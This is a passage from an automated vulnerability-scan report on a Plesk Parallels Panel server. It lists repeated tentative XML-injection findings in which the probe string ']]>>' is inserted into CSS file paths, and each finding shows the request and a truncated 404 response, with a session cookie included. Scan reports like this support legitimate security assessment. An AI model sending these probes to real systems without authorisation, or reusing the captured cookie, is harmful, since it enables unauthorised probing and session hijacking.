Path:   /skins/default/plesk/css/general.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/plesk/css/general.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:06 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.103. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/general.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/general.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk]]>>/css/general.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:08 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.104. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/general.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/general.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css]]>>/general.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:10 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.105. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/general.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/general.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/general.css]]>>?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:12 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.106. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/ie.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/ie.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/plesk/css/ie.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:20 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.107. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/ie.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/ie.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/plesk/css/ie.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:23 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.108. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/ie.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/ie.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk]]>>/css/ie.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:25 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.109. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/ie.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/ie.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css]]>>/ie.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:28 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.110. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/ie.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/ie.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/ie.css]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:30 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.111. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/custom.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/left/custom.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/plesk/css/left/custom.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:21 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.112. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/custom.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/left/custom.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/plesk/css/left/custom.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:23 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.113. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/custom.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/left/custom.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk]]>>/css/left/custom.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:25 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.114. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/custom.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/left/custom.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css]]>>/left/custom.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:28 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.115. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/custom.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/left/custom.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/left]]>>/custom.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:30 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.116. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/custom.css [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/left/custom.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/left/custom.css]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:32 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.117. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/layout.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/left/layout.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/plesk/css/left/layout.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:21 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.118. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/layout.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/left/layout.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/plesk/css/left/layout.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:23 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.119. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/layout.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/left/layout.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk]]>>/css/left/layout.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:25 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.120. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/layout.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/left/layout.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css]]>>/left/layout.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:27 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.121. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/layout.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/left/layout.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/left]]>>/layout.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:29 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.122. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/layout.css [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/left/layout.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/left/layout.css]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:19:32 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.123. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/apps-control.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/apps-control.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/plesk/css/main/apps-control.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
